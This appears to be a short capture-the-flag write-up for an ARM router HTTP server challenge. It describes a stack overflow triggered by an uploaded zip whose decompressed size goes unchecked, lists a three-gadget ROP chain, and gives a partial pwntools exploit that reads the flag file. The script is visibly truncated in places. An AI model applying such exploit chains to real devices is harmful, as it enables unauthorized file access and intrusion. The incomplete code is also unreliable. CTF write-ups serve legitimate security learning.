1337router was an arm executable, aslr disabled, implementing a HTTP server. The vulnerability was that we could upload a zip file (wich contained a httpd.conf). The zip got deflated afterwards. The zip file had a size limitation of 512 bytes. Of course the deflated size was not checked and it got deflated on the stack. Its time for ROPgadget.

I used a function of the executable to help me in reading any file. It was meant to read a html file and send it back as a HTTP response. It had two parameters. Buffer (in r1) and a path to the file (in r0). As there was no aslr buffer could just point to a static position. r0 was a little bit more difficult as the stack had randomization. However gdb told me that r4 pointed into the stack at a controllable position, so lets just move r4 into r0. We end up with a simple ropchain.

0x849ec pop{r1, pc};
0x691ec mov r0, r4; pop {r4, r5, r6, r7, r8, pc};
0x10934 sendresponse(buf, filepath);

the final dirty code.

from pwn import *
import zipfile

r = remote("", 5555)

def buildreq(content):
    return "POST /page?=conf HTTP/1.1\r\n" + \
           "Host:\r\n" + \
           "Connection: keep-alive\r\n" + \
           "Content-Length: " + str(191 + len(content)) + "\r\n" + \
           "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOVOtoTifyI9clR75\r\n" + \
           "User-Agent: Mozilla/5.0\r\n" + \
           "Accept: text/html\r\n\r\n" + \
           "------WebKitFormBoundaryOVOtoTifyI9clR75\r\n" + \
           "Content-Disposition: form-data; name=\"config\"; filename=\"config.zip\"\r\n" + \
           "Content-Type: application/zip\r\n\r\n" + \
           content + \

def sploit():
    fname = "flag"
    with zipfile.ZipFile("file.zip", "w", compression=zipfile.ZIP_DEFLATED) as zip:
            "httpd.conf", "A" * 524 + struct.pack(
            "<IIIIIIIII", 0x849ec, 0xaef4c, 0x691ec, 0, 0, 0, 0, 0, 0x10934) + "B" * 8 + fname + '\x00')
    with open("file.zip", "rb") as f:
        content = f.read()

if __name__ == '__main__':